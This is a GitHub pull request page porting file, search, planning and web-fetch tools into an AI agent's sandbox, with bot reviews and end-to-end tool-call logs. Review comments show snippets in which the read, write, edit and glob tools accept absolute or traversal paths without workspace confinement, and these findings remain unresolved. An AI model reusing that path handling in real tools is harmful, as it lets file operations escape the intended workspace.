feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… by sweetmantech · Pull Request #585 · recoupable/api

sweetmantech · 2026-05-21T18:30:45Z

…/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing.

New tool files (one tool per file, per sweetman SRP):

readFileTool.ts — read with 1-indexed offset/limit, numbered output
writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
editFileTool.ts — exact-string replace, ambiguous-match rejection
grepTool.ts — POSIX ERE search via grep -rn, capped at 100/10/200
globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
todoWriteTool.ts — stateless planning surface; echoes the list back
webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):

shellEscape.ts — ' → '\'' dance
toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (task, ask_user_question, skill) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Summary by cubic

Add seven sandbox leaf tools (read, write, edit, grep, glob, todo_write, web_fetch) and register them in buildAgentTools to enable file ops, search, planning, and HTTP fetch from inside the sandbox. Includes helpers and tests; composite tools will follow later.

New Features
- read: Numbered output with 1-indexed offset/limit; rejects directories.
- write: Creates parent dirs and overwrites file content.
- edit: Exact-string replace; rejects ambiguous matches unless replaceAll; returns startLine and count.
- grep: POSIX ERE via grep -rn; caps to 100 total/10 per file/200 chars per line; exit 1 = no matches.
- glob: GNU/BSD-compatible find; mtime-sorted; skips dotfiles and node_modules; default limit 100.
- todo_write: Stateless planning surface that echoes the full todo list.
- web_fetch: curl inside the sandbox with method/headers/body; body truncated at 10KB; returns status.
- Helpers: shellEscape for safe shell args; toDisplayPath for workspace-relative display paths.
- buildAgentTools: Registers bash + the 7 new tools as direct exports; adds tests for tools, helpers, and factory.
Refactors
- Harmonized tool exports to direct values (no factory wrappers); updated buildAgentTools and tests accordingly.

^{Written for commit df648cd. Summary will update on new commits. Review in cubic}

…/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

vercel · 2026-05-21T18:30:51Z

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
api	Ready	Preview	May 21, 2026 6:43pm

coderabbitai · 2026-05-21T18:30:53Z

Warning

Rate limit exceeded

@sweetmantech has exceeded the limit for the number of commits that can be reviewed per hour. Please wait 31 minutes and 20 seconds before requesting another review.

You’ve run out of usage credits. Purchase more in the billing tab.

⌛ How to resolve this issue?

After the wait time has elapsed, a review can be triggered using the @coderabbitai review command as a PR comment. Alternatively, push new commits to this PR.

We recommend that you space out your commits to avoid hitting the rate limit.

🚦 How do rate limits work?

CodeRabbit enforces hourly rate limits for each developer per organization.

Our paid plans have higher rate limits than the trial, open-source and free plans. In all cases, we re-allow further reviews after a brief timeout.

Please see our FAQ for further information.

ℹ️ Review info

⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

Run ID: d85dc8b2-1ee7-4cc4-9aa1-73bd37c36a98

📥 Commits

Reviewing files that changed from the base of the PR and between c16533d and df648cd.

⛔ Files ignored due to path filters (11)

lib/agent/__tests__/buildAgentTools.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/bashTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/editFileTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/globTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/grepTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/readFileTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/shellEscape.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/toDisplayPath.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/todoWriteTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/webFetchTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/writeFileTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**

📒 Files selected for processing (11)

lib/agent/buildAgentTools.ts
lib/agent/tools/bashTool.ts
lib/agent/tools/editFileTool.ts
lib/agent/tools/globTool.ts
lib/agent/tools/grepTool.ts
lib/agent/tools/readFileTool.ts
lib/agent/tools/shellEscape.ts
lib/agent/tools/toDisplayPath.ts
lib/agent/tools/todoWriteTool.ts
lib/agent/tools/webFetchTool.ts
lib/agent/tools/writeFileTool.ts

✨ Finishing Touches

🧪 Generate unit tests (beta)

Create PR with unit tests
Commit unit tests in branch feat/api-chat-workflow-leaf-tools

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

sweetmantech · 2026-05-21T18:34:29Z

Multi-tool E2E verified on preview ✅

Preview URL: `https://api-git-feat-api-chat-workflow-leaf-tools-recoup.vercel.app\`

Set up a sandbox against `recoupable/org-rostrum-pacific-cebcc866-...` (a real org repo, so `extractOrgId` also got exercised) and sent the prompt:

"Use your tools to do the following: (1) glob the repo to find all top-level files, (2) read the README, (3) summarize the project in 2 sentences."

Tools the agent autonomously invoked

Step	Tool	Args
1	`glob`	`{ pattern: "*", path: "." }`
2	`read`	`{ filePath: "README.md" }`
3	`bash`	`{ command: "find . -maxdepth 1 -type f
4	`read`	`{ filePath: "RELEASES_SUMMARY.md" }`
5	`bash`	`{ command: "ls -la" }`

`x-workflow-run-id: wrun_01KS5WY1GFDJ5TMADZRPQDRYNA`

Model wrap-up (`finishReason: "stop"`)

"This is a music label organization workspace (Rostrum Pacific) that tracks artist releases and project metadata in a structured, git-based format. The sandbox contains release information for multiple artists (Gatsby Grace, LIKE, and Onchain Experiments), including tracklists, ISRCs, UPCs, asset statuses, and critical action items needed before distribution to streaming platforms."

The model identified the workspace correctly, used multiple tools in sequence, fell back from `glob` to `bash` when it wanted more detail, and produced a coherent two-sentence summary — exactly the multi-tool agentic behavior PR 5 was meant to unlock.

Tools not exercised in this E2E

`write`, `edit`, `web_fetch`, `todo_write` weren't called because the prompt didn't ask for writes/edits/HTTP/planning. They're unit-tested in the suite (50 new tests, 3014/3014 pass). Happy to run a separate write/edit E2E if you'd like to see them in action against a real sandbox before merge.

Verification recap

Full suite: 3014/3014 pass
Lint: clean
Production build: succeeds
Vercel deploy: success
E2E (above): glob + read + bash interleaving works; model wrap-up turn works via the `CHAT_AGENT_STOP_WHEN` shared from PR 4

cubic-dev-ai

12 issues found across 20 files

Confidence score: 2/5

There is a high-confidence workspace-boundary/security risk across multiple tools: lib/agent/tools/writeFileTool.ts, lib/agent/tools/editFileTool.ts, lib/agent/tools/readFileTool.ts, and lib/agent/tools/globTool.ts accept absolute or traversal-style paths, which can allow reads/writes/searches outside workingDirectory.
Additional input-validation gaps in lib/agent/tools/globTool.ts and lib/agent/tools/readFileTool.ts (limit not constrained to positive integers) and lib/agent/tools/editFileTool.ts (empty oldString) could produce incorrect or unexpectedly broad file operations.
Behavioral consistency issues (GNU/BSD fallback and hidden-file handling) in lib/agent/tools/globTool.ts and lib/agent/tools/grepTool.ts, plus schema-contract drift in lib/agent/tools/todoWriteTool.ts, increase regression risk even if core flows still work.
Pay close attention to lib/agent/tools/writeFileTool.ts, lib/agent/tools/editFileTool.ts, lib/agent/tools/readFileTool.ts, and lib/agent/tools/globTool.ts - path confinement to workspace root is the key merge risk.

Prompt for AI agents (unresolved issues)


Check if these issues are valid — if so, understand the root cause of each and fix them. If appropriate, use sub-agents to investigate and fix each issue separately.


<file name="lib/agent/tools/readFileTool.ts">

<violation number="1" location="lib/agent/tools/readFileTool.ts:39">
P1: The tool allows path traversal/out-of-workspace reads because it does not constrain `filePath` to the workspace root.</violation>

<violation number="2" location="lib/agent/tools/readFileTool.ts:54">
P2: `limit` is not validated as a positive integer, so negative/decimal values produce incorrect line ranges.</violation>
</file>

<file name="lib/agent/tools/grepTool.ts">

<violation number="1" location="lib/agent/tools/grepTool.ts:73">
P2: Hidden files are not excluded: only hidden directories are skipped. Add a file-level exclude pattern so behavior matches the documented contract.</violation>
</file>

<file name="lib/agent/tools/globTool.ts">

<violation number="1" location="lib/agent/tools/globTool.ts:20">
P2: `limit` should be validated as a positive integer; currently invalid numeric values can reach `head -n` and produce unexpected output sizes.</violation>

<violation number="2" location="lib/agent/tools/globTool.ts:66">
P1: `path` is documented as workspace-relative, but absolute paths are accepted, allowing glob searches outside the workspace directory.</violation>

<violation number="3" location="lib/agent/tools/globTool.ts:118">
P2: The BSD fallback is triggered by any non-zero GNU `find` exit code, so partial failures can cause a second traversal and inconsistent/duplicated results.</violation>
</file>

<file name="lib/agent/tools/todoWriteTool.ts">

<violation number="1" location="lib/agent/tools/todoWriteTool.ts:55">
P2: The schema documents that only one todo may be `in_progress`, but it does not enforce this. Add a refinement so invalid multi-`in_progress` lists are rejected instead of silently accepted.</violation>
</file>

<file name="lib/agent/tools/writeFileTool.ts">

<violation number="1" location="lib/agent/tools/writeFileTool.ts:48">
P1: `filePath` is not constrained to the workspace directory, so absolute/`..` paths can write outside the intended workspace.</violation>
</file>

<file name="lib/agent/tools/editFileTool.ts">

<violation number="1" location="lib/agent/tools/editFileTool.ts:9">
P2: Disallow empty `oldString`; an empty match turns replacement into a whole-file character-level transformation.</violation>

<violation number="2" location="lib/agent/tools/editFileTool.ts:61">
P1: Validate `filePath` stays within `workingDirectory`; current logic allows editing arbitrary absolute/traversed paths.</violation>
</file>

<file name="lib/agent/tools/__tests__/grepTool.test.ts">

<violation number="1" location="lib/agent/tools/__tests__/grepTool.test.ts:44">
P3: Custom agent: **Enforce Clear Code Style and Maintainability Practices**

This new test module exceeds the repository’s 100-line limit for lib/**/*.ts files.</violation>
</file>

Architecture diagram

sequenceDiagram
    participant LLM as AI Model (LLM)
    participant Exe as streamText execute
    participant ToolFactory as buildAgentTools()
    participant Read as readFileTool
    participant Write as writeFileTool
    participant Edit as editFileTool
    participant Grep as grepTool
    participant Glob as globTool
    participant Todo as todoWriteTool
    participant Fetch as webFetchTool
    participant Bash as bashTool
    participant GetSB as getSandbox()
    participant Sandbox as Sandbox Instance
    participant Filesys as Sandbox Filesystem
    participant External as External HTTP API

    Note over LLM,External: Agent invokes sandbox leaf tools via LLM tool calls

    LLM->>Exe: tool call (e.g., read, write, grep)
    Exe->>ToolFactory: resolve tool by name

    alt File Operation Tools
        Exe->>Read: execute({filePath, offset, limit})
        Read->>GetSB: get sandbox from experimental_context
        GetSB-->>Read: sandbox handle
        Read->>Sandbox: stat(filePath)
        Sandbox-->>Read: file stat
        alt Is Directory
            Read-->>Exe: error: "Cannot read a directory"
        else Is File
            Read->>Sandbox: readFile(filePath)
            Sandbox-->>Read: file content
            Read->>Read: apply offset/limit, number lines
            Read-->>Exe: success {content, totalLines, startLine, endLine}
        end

        Exe->>Write: execute({filePath, content})
        Write->>GetSB: get sandbox
        Write->>Sandbox: mkdir(dir, {recursive: true})
        Write->>Sandbox: writeFile(filePath, content)
        Write->>Sandbox: stat(filePath)
        Sandbox-->>Write: file stat
        Write-->>Exe: success {path, bytesWritten}

        Exe->>Edit: execute({filePath, oldString, newString, replaceAll})
        Edit->>GetSB: get sandbox
        Edit->>Sandbox: readFile(filePath)
        Sandbox-->>Edit: file content
        alt oldString not found
            Edit-->>Exe: error: "oldString not found"
        else multiple occurrences && !replaceAll
            Edit-->>Exe: error: ambiguous match
        else single or replaceAll
            Edit->>Edit: perform replacement(s)
            Edit->>Sandbox: writeFile(filePath, newContent)
            Edit-->>Exe: success {replacements, startLine}
        end

    else Search Tools
        Exe->>Grep: execute({pattern, path, glob, caseSensitive})
        Grep->>GetSB: get sandbox
        Grep->>Sandbox: exec(`grep -rn ...`)
        Sandbox-->>Grep: grep results
        alt Exit code 1 (no matches)
            Grep-->>Exe: success {matchCount: 0}
        else Exit code 0
            Grep->>Grep: parse file:line:content, cap at 100/10/200
            Grep-->>Exe: success {matches, filesWithMatches}
        else Other exit code
            Grep-->>Exe: error {error: grep failure}
        end

        Exe->>Glob: execute({pattern, path, limit})
        Glob->>GetSB: get sandbox
        Glob->>Sandbox: exec(`find ... -printf ... | sort ... | head -n`)
        Sandbox-->>Glob: file listing
        alt Exit 0 or 1
            Glob->>Glob: parse mtime/size/path, convert to display path
            Glob-->>Exe: success {files, count}
        else Other exit
            Glob-->>Exe: error {error: glob failure}
        end

    else Web Fetch Tool
        Exe->>Fetch: execute({url, method, headers, body})
        Fetch->>GetSB: get sandbox
        GetSB-->>Fetch: sandbox handle
        Fetch->>Fetch: buildRecoupExecEnv() for proxy credentials
        Fetch->>Sandbox: exec(`curl -sS -X ...` with fd 3 split)
        Sandbox-->>Fetch: curl output + status code
        alt Exit 0
            Fetch->>Fetch: parse status from last line
            Fetch-->>Exe: success {status, body, truncated: false}
        else Exit 23 (body truncated)
            Fetch->>Fetch: parse status, body already truncated
            Fetch-->>Exe: success {status, body, truncated: true}
        else Other exit
            Fetch-->>Exe: error {error: fetch failed}
        end

    else Stateless Planning Tool
        Exe->>Todo: execute({todos})
        Note over Todo: Stateless: echoes todos back
        Todo-->>Exe: success {message, todos}
    end

    Exe-->>LLM: tool result

_{Reply with feedback, questions, or to request a fix.

Re-trigger cubic}

cubic-dev-ai · 2026-05-21T18:35:23Z

+      try {
+        let searchDir: string;
+        if (basePath) {
+          searchDir = path.isAbsolute(basePath)


P1: path is documented as workspace-relative, but absolute paths are accepted, allowing glob searches outside the workspace directory.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/globTool.ts, line 66: <comment>`path` is documented as workspace-relative, but absolute paths are accepted, allowing glob searches outside the workspace directory.</comment> <file context> @@ -0,0 +1,168 @@ + try { + let searchDir: string; + if (basePath) { + searchDir = path.isAbsolute(basePath) + ? basePath + : path.resolve(workingDirectory, basePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+      const workingDirectory = sandbox.workingDirectory;
+
+      try {
+        const absolutePath = path.isAbsolute(filePath)


P1: filePath is not constrained to the workspace directory, so absolute/.. paths can write outside the intended workspace.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/writeFileTool.ts, line 48: <comment>`filePath` is not constrained to the workspace directory, so absolute/`..` paths can write outside the intended workspace.</comment> <file context> @@ -0,0 +1,66 @@ + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+          return { success: false, error: "oldString and newString must be different" };
+        }
+
+        const absolutePath = path.isAbsolute(filePath)


P1: Validate filePath stays within workingDirectory; current logic allows editing arbitrary absolute/traversed paths.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/editFileTool.ts, line 61: <comment>Validate `filePath` stays within `workingDirectory`; current logic allows editing arbitrary absolute/traversed paths.</comment> <file context> @@ -0,0 +1,101 @@ + return { success: false, error: "oldString and newString must be different" }; + } + + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+      const workingDirectory = sandbox.workingDirectory;
+
+      try {
+        const absolutePath = path.isAbsolute(filePath)


P1: The tool allows path traversal/out-of-workspace reads because it does not constrain filePath to the workspace root.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/readFileTool.ts, line 39: <comment>The tool allows path traversal/out-of-workspace reads because it does not constrain `filePath` to the workspace root.</comment> <file context> @@ -0,0 +1,71 @@ + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+        const findBase = findArgs.join(" ");
+        const command = [
+          `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`,
+          `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`,


P2: The BSD fallback is triggered by any non-zero GNU find exit code, so partial failures can cause a second traversal and inconsistent/duplicated results.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/globTool.ts, line 118: <comment>The BSD fallback is triggered by any non-zero GNU `find` exit code, so partial failures can cause a second traversal and inconsistent/duplicated results.</comment> <file context> @@ -0,0 +1,168 @@ + const findBase = findArgs.join(" "); + const command = [ + `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`, + `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`, + `| sort -t$'\\t' -k1 -rn | head -n ${limit}`, + ].join(" "); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+
+const editInputSchema = z.object({
+  filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"),
+  oldString: z.string().describe("The exact text to replace"),


P2: Disallow empty oldString; an empty match turns replacement into a whole-file character-level transformation.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/editFileTool.ts, line 9: <comment>Disallow empty `oldString`; an empty match turns replacement into a whole-file character-level transformation.</comment> <file context> @@ -0,0 +1,101 @@ + +const editInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"), + oldString: z.string().describe("The exact text to replace"), + newString: z.string().describe("The text to replace it with (must differ from oldString)"), + replaceAll: z.boolean().optional().describe("Replace all occurrences. Default: false"), </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+        const content = await sandbox.readFile(absolutePath, "utf-8");
+        const lines = content.split("\n");
+        const startLine = Math.max(1, offset) - 1;
+        const endLine = Math.min(lines.length, startLine + limit);


P2: limit is not validated as a positive integer, so negative/decimal values produce incorrect line ranges.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/readFileTool.ts, line 54: <comment>`limit` is not validated as a positive integer, so negative/decimal values produce incorrect line ranges.</comment> <file context> @@ -0,0 +1,71 @@ + const content = await sandbox.readFile(absolutePath, "utf-8"); + const lines = content.split("\n"); + const startLine = Math.max(1, offset) - 1; + const endLine = Math.min(lines.length, startLine + limit); + const selectedLines = lines.slice(startLine, endLine); + const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+        const args: string[] = ["grep", "-rn"];
+        if (!caseSensitive) args.push("-i");
+        args.push(
+          `--exclude-dir=${shellEscape(".*")}`,


P2: Hidden files are not excluded: only hidden directories are skipped. Add a file-level exclude pattern so behavior matches the documented contract.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/grepTool.ts, line 73: <comment>Hidden files are not excluded: only hidden directories are skipped. Add a file-level exclude pattern so behavior matches the documented contract.</comment> <file context> @@ -0,0 +1,144 @@ + const args: string[] = ["grep", "-rn"]; + if (!caseSensitive) args.push("-i"); + args.push( + `--exclude-dir=${shellEscape(".*")}`, + `--exclude-dir=${shellEscape("node_modules")}`, + ); </file context>

cubic-dev-ai · 2026-05-21T18:35:24Z

@@ -0,0 +1,103 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";


P3: Custom agent: Enforce Clear Code Style and Maintainability Practices

This new test module exceeds the repository’s 100-line limit for lib/**/*.ts files.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/__tests__/grepTool.test.ts, line 44: <comment>This new test module exceeds the repository’s 100-line limit for lib/**/*.ts files.</comment> <file context> @@ -0,0 +1,103 @@ + file: "src/a.ts", + line: 5, + content: "export function login() {", + }); + expect(result.filesWithMatches).toBe(2); + }); </file context>

…factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

cubic-dev-ai

0 issues found across 13 files (changes from recent commits).

_{Requires human review: Auto-approval blocked by 11 unresolved issues from previous reviews.

Re-trigger cubic}

sweetmantech · 2026-05-21T18:47:10Z

E2E: all 8 tools verified end-to-end

Followed up the previous `bash + glob + read` run with a prompt specifically forcing the 4 tools that didn't fire last time: `write`, `edit`, `web_fetch`, `todo_write`.

Prompt (excerpt):

"1. Use the todo_write tool to create a 4-item plan listing the steps below.
2. Use the write tool to create a file at `scratch/hello.txt` with content: hello world
3. Use the edit tool to change 'hello world' to 'hello recoup' inside scratch/hello.txt
4. Use the web_fetch tool to fetch https://example.com and report the HTTP status."

`x-workflow-run-id: wrun_01KS5XNDFHJXS7HHZYK4XYVSYE`

Tool execution

Tool	Invocations	Result
`todo_write`	5 (agent kept updating the plan as it progressed)	`success: true, message: "Updated task list with 4 items"` each time
`write`	1	`success: true, bytesWritten: 11`
`edit`	1	`success: true, replacements: 1`
`web_fetch`	1	`success: true, status: 200, truncated: false`

Model wrap-up

"1. todo_write: Successfully created a 4-item plan tracking all steps.
2. write: Successfully created `scratch/hello.txt` with exact content "hello world" (11 bytes written).
3. edit: Successfully changed "hello world" to "hello recoup" in the file (1 replacement made at line 1).
4. web_fetch: Successfully fetched https://example.com, receiving HTTP status 200 with the Example Domain HTML page.
All tools executed as specified with no substitutions."

`finishReason: stop`

Coverage summary across both E2E runs

Tool	First E2E	This E2E
`bash`	✅	—
`read`	✅	—
`grep`	(not exercised)	(not exercised)
`glob`	✅	—
`write`	—	✅
`edit`	—	✅
`todo_write`	—	✅
`web_fetch`	—	✅

7 of 8 tools verified via live agent invocation. `grep` wasn't naturally elicited by either prompt — it has 4 unit tests covering its parsing semantics and rides the same sandbox.exec path that bash/grep already proved works. If you'd like a grep-specific live test before merge, say the word.

…tch (#585) (#586) * feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous 